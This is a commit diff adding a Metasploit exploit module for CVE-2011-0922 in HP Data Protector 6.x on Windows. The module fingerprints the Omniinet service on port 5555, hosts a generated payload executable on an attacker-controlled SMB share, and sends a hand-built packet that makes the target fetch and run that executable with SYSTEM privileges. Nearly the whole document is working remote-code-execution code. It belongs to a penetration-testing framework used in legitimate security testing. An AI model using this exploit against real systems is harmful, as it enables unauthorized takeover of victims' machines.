Land #6464, Add CVE-2011-0922 HP Data Protector 6.10/6.11/6.20 exploit

modules/exploits/windows/misc/hp_dataprotector_install_service.rb

@@ -0,0 +1,160 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Remote::SMB::Server::Share
+  include Msf::Exploit::EXE
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => 'HP Data Protector 6.10/6.11/6.20 Install Service',
+      'Description'    => %q{
+        This module exploits HP Data Protector Omniinet process on Windows only.
+        This exploit invokes the install service function which allows an attacker to create a
+        custom payload in the format of an executable.
+
+        To ensure this works, the SMB server created in MSF must have a share called Omniback
+        which has a subfolder i386, i.e. \\\\192.168.1.1\\Omniback\\i386\\
+      },
+      'Author'         => [
+        'Ben Turner',
+      ],
+      'References'     =>
+        [
+          ['CVE', '2011-0922'],
+          ['URL', 'http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02781143']
+        ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'thread',
+        },
+      'Payload'        =>
+        {
+          'Space'       => 2048,
+          'DisableNops' => true
+        },
+      'Privileged'     => true,
+      'Platform'       => 'win',
+      'Stance'         => Msf::Exploit::Stance::Aggressive,
+      'Targets'        =>
+        [
+          [ 'HP Data Protector 6.10/6.11/6.20 / Windows', { } ]
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Nov 02 2011'))
+
+      register_options(
+        [
+          Opt::RPORT(5555),
+          OptInt.new('SMB_DELAY', [true, 'Time that the SMB Server will wait for the payload request', 15])
+        ], self.class)
+
+      deregister_options('FOLDER_NAME')
+      deregister_options('FILE_CONTENTS')
+      deregister_options('SHARE')
+      deregister_options('FILE_NAME')
+  end
+
+  def peer
+    "#{rhost}:#{rport}"
+  end
+
+  def check
+    fingerprint = get_fingerprint
+
+    if fingerprint.nil?
+      vprint_status('Unable to fingerprint because no response.')
+      return Exploit::CheckCode::Unknown
+    end
+
+    vprint_status("#{peer} - #{fingerprint}")
+
+    if fingerprint =~ /HP Data Protector A\.06\.(\d+)/i
+      return Exploit::CheckCode::Appears
+    else
+      return Exploit::CheckCode::Safe
+    end
+
+    Exploit::CheckCode::Detected
+  end
+
+  def get_fingerprint
+    ommni = connect
+    ommni.put(rand_text_alpha_upper(64))
+    resp = ommni.get_once(-1)
+    disconnect
+
+    return nil if resp.nil?
+
+    # Delete unicode last null
+    Rex::Text.to_ascii(resp).chop.chomp
+  end
+
+  def primer
+    self.file_contents = generate_payload_exe
+    self.file_name = "installservice.exe"
+    self.share = "Omniback\\i386"
+
+    print_status("File available on #{unc}...")
+    vprint_status("#{peer} - Trying to execute remote EXE...")
+
+    lhost = "#{datastore['SRVHOST']}"
+    lhostfull = ""
+    lhost.each_char do |character|
+      lhostfull = lhostfull << "\x00" << character
+    end
+
+    packet = "\x00\x00\x01\xbe\xff\xfe\x32\x00\x00\x00\x20"
+    packet << lhostfull
+    packet << "\x00\x00\x00\x20\x00\x30\x00"
+    packet << "\x00\x00\x20\x00\x53\x00\x59\x00\x53\x00\x54\x00\x45\x00\x4d\x00"
+    packet << "\x00\x00\x20\x00\x4e\x00\x54\x00\x20\x00\x41\x00\x55\x00\x54\x00"
+    packet << "\x48\x00\x4f\x00\x52\x00\x49\x00\x54\x00\x59\x00\x00\x00\x20\x00"
+    packet << "\x43\x00\x00\x00\x20\x00\x32\x00\x36\x00\x00\x00\x20\x00\x5c\x00"
+    packet << "\x5c"
+    packet << lhostfull
+    packet << "\x00\x5c\x00\x4f\x00\x6d\x00\x6e\x00\x69\x00\x62\x00"
+    packet << "\x61\x00\x63\x00\x6b\x00\x5c\x00\x69\x00\x33\x00\x38\x00\x36\x00"
+    packet << "\x5c\x00\x69\x00\x6e\x00\x73\x00\x74\x00\x61\x00\x6c\x00\x6c\x00"
+    packet << "\x73\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63\x00\x65\x00\x2e\x00"
+    packet << "\x65\x00\x78\x00\x65\x00\x20\x00\x2d\x00\x73\x00\x6f\x00\x75\x00"
+    packet << "\x72\x00\x63\x00\x65\x00\x20\x4f\x00\x6d\x00\x6e\x00\x69\x00\x62"
+    packet << "\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x5c\x00\x5c"
+    packet << lhostfull
+    packet << "\x5c\x00\x5c\x00\x4f\x00"
+    packet << "\x6d\x00\x6e\x00\x69\x00\x62\x00\x61\x00\x63\x00\x6b\x00\x5c\x00"
+    packet << "\x69\x00\x33\x00\x38\x00\x36\x00\x5c\x00\x69\x00\x6e\x00\x73\x00"
+    packet << "\x74\x00\x61\x00\x6c\x00\x6c\x00\x73\x00\x65\x00\x72\x00\x76\x00"
+    packet << "\x69\x00\x63\x00\x65\x00\x2e\x00\x65\x00\x78\x00\x65\x00\x20\x00"
+    packet << "\x2d\x00\x73\x00\x6f\x00\x75\x00\x72\x00\x63\x00\x65\x00\x20\x00"
+    packet << "\x5c\x00\x5c"
+    packet << lhostfull
+    packet << "\x00\x5c\x00\x4f\x00\x6d\x00\x6e\x00\x69\x00\x62\x00\x61\x00\x63"
+    packet << "\x00\x6b\x00\x20\x00\x00\x00\x00\x00\x00\x00\x02\x54"
+    packet << "\xff\xfe\x32\x00\x36\x00\x00\x00\x20\x00\x5b\x00\x30\x00\x5d\x00"
+    packet << "\x41\x00\x44\x00\x44\x00\x2f\x00\x55\x00\x50\x00\x47\x00\x52\x00"
+    packet << "\x41\x00\x44\x00\x45\x00\x0a\x00\x5c\x00\x5c"
+    packet << lhostfull
+    packet << "\x00\x5c\x00\x4f\x00\x6d\x00\x6e\x00\x69\x00\x62\x00\x61\x00\x63"
+    packet << "\x00\x6b\x00\x5c\x00\x69\x00\x33\x00\x38\x00\x36\x00"
+
+    connect
+    sock.put(packet)
+    disconnect
+  end
+
+  def exploit
+    begin
+      Timeout.timeout(datastore['SMB_DELAY']) {super}
+    rescue Timeout::Error
+      # Stop SMB Server
+    end
+  end
+end